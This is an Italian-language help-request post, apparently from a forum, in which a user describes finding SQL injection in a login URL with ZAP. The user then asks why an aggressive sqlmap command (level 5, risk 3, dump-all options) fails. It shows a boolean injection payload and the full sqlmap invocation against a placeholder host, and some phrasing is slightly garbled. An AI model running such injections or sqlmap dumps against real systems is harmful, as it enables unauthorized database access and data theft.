Ho usato il proxy ZAP per determinare che il login fosse iniettabile con la richiesta GET come login "AND" 1 "=" 1 era iniettabile, ma mi ha restituito l'URL in questo formato:
https://example.com/login%22%20AND%20%221%22=%221
Ho controllato, ed è iniettabile a quel punto, ma non so quali parametri usare per sfruttarlo. La mia attuale configurazione, con reindirizzamenti disabilitati (non mostrati), non funziona. Ecco la configurazione:
sqlmap -u "https://example.com/login%22%20AND%20%221%22=%221" --level=5 --risk=3 --fingerprint --common-tables --dbs --all --common-columns --technique=BEUSTQ --keep-alive --dependencies --hex --timeout=120 --time-sec=10
Per qualche ragione, anche con tra disabili, sta cambiando sqlmap
login" AND "1"="1 a #1*